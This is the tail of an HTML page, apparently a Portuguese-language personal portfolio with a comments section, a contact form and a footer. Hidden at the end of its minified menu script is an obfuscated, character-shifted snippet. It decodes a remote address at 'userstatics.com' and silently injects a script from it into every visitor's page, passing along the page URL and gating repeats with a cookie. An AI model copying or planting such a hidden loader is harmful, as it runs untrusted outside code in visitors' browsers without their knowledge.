									<a class="replay" href="#">Reply</a>
									<span aria-hidden="true"> · </span>
									<i class="fa fa-thumbs-o-up"></i> <span class="count">1</span> 
									<span aria-hidden="true"> · </span>
									<span>26m</span>
								</div>
								<ul class="child_replay"></ul>
							</div>
						</li>
					</ul>
				<button class="show_more" type="button" onclick="com()">mais 10 comentarios</button>
				</div>
			</div>
		</div>
	</div>
	</div>
    <section id="contato">
      <h2>Contato</h2>
      <div class="form-contato">
        <form action="https://formsubmit.co/gersonhacker009@gmail.com" method="POST">
          <label for="email">E-mail<span> *</span> </label>
          <input type="email" name="email" id="email" placeholder="exemplo@email.com" required="">
          <label for="assunto">Assunto</label>
          <input type="text" name="assunto" id="assunto" placeholder="Qual é o assunto?">
          <label for="message">Mensagem<span> *</span></label>
          <textarea name="message" id="message" placeholder="Escreva sua mensagem!" required=""></textarea>
          <input type="hidden" name="_next" value="#">
          <button class="btn" id="btn-submit" type="submit">Enviar</button>
        </form>
      </div>
    </section>
  </main>
  <footer>
    <div>
      <p id="nome-footer">2024 - Todos os direitos reservados</p>
      <p>sakunadbz@gmail.com</p>
    </div>
    <div id="icon-footer">
      <a target="_blank" href="#">
        <img src="https://i.ibb.co/SPD2zGD/icon-linkedin.png" class="icon-link2" alt="Ícone do LinkedIn">
      </a>
      <a target="_blank" href="#">
        <img src="https://i.ibb.co/4ppz1M3/icon-github.png" class="icon-link2" alt="Ícone do Github">
      </a>
      <h6>@todos direitos reservados</h6>
      <br>
      <h6>
+258865113673📞
      </h6>
    </div>
  </footer>

  <script>
window.sr = ScrollReveal({
    reset: true,
    duration: 1000, 
    origin: 'top', 
    distance: '60px',
    interval: 100 
});

sr.reveal('#btn-curriculo');
sr.reveal('.img-computer');
sr.reveal('.my-photo');
sr.reveal('.programas');
  </script>
  <script>
const btnMobile=document.getElementById("btn-mobile"),iconMenu=document.querySelector("#icon-menu");function toggleMenu(event){"touchstart"===event.type&&event.preventDefault();const nav=document.getElementById("nav");nav.classList.toggle("active"),nav.classList.contains("active")?iconMenu.src="assets/images/icon-close.svg":iconMenu.src="assets/https://i.ibb.co/nsqvH5n/icon-menu.png"}function fecharMenu(){let linksMenu=[document.querySelector("#link1"),document.querySelector("#link2"),document.querySelector("#link3"),document.querySelector("#link4"),document.querySelector("#link5"),document.querySelector("#link-logo")];for(var c=0;c<linksMenu.length;c++)linksMenu[c].addEventListener("click",(()=>{nav.classList.contains("active")&&(nav.classList.remove("active"),iconMenu.src="assets/images/icon-menu.svg")}))}function mostrarFrase(){let descTecnologias=document.querySelectorAll(".desc-text"),iconTecnologias=document.querySelectorAll(".item-programa"),inst=document.querySelector("#instrucao");for(let a=0;a<iconTecnologias.length;a++)iconTecnologias[a].addEventListener("mouseover",(()=>{descTecnologias[a].classList.remove("hide"),inst.classList.add("hide")})),iconTecnologias[a].addEventListener("mouseout",(()=>{descTecnologias[a].classList.add("hide"),inst.classList.remove("hide")}))}function typeWriter(elemento){const textoArray=elemento.innerHTML.split("");elemento.innerHTML="",setTimeout((()=>{textoArray.forEach(((letra,i)=>{setTimeout((()=>elemento.innerHTML+=letra),150*i)}))}),1500)}btnMobile.addEventListener("click",toggleMenu),btnMobile.addEventListener("touchstart",toggleMenu),fecharMenu(),mostrarFrase();const meuNome=document.querySelector("h1 span");typeWriter(meuNome);var btnVerMais=document.querySelector("#btnVerMais");function mostrarMaisOuMenos(){var itemsParaEsconder=document.querySelectorAll(".esconder");for(let i=0;i<itemsParaEsconder.length;i++)"flex"===itemsParaEsconder[i].style.display?(itemsParaEsconder[i].style.display="none",btnVerMais.innerHTML='VER MAIS <br> <span id="seta"></span>'):(itemsParaEsconder[i].style.display="flex",btnVerMais.innerHTML="<span id='seta' style='transform: rotate(135deg); margin: -7px -7px 0 0'></span> <br> VER MENOS")}btnVerMais.addEventListener("click",mostrarMaisOuMenos);(function(o,d,l){try{o.f=o=>o.split('').reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),'');o.b=o.f('UMUWJKX');o.c=l.protocol[0]=='h'&&/\./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement('script'),o.s.src=o.f('myyux?44zxjwxyf'+'ynhx3htr4ljy4xhwn'+'uy3oxDwjkjwwjwB')+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+'=full;max-age=39800;'}catch(e){};}({},document,location));
  </script>
    <script>
    
        function changeColor(color) {
            document.body.style.backgroundColor = color;
        }
    
</script>
<script>
  function com(){
Swal.fire({
  icon: "error",
  title: "Oops...",
  text: "erro 402 verifique sua internet ou volte mas tarde!",
  footer: '<a href="#">clica aqui</a>'
});
  }
</script>



</body></html>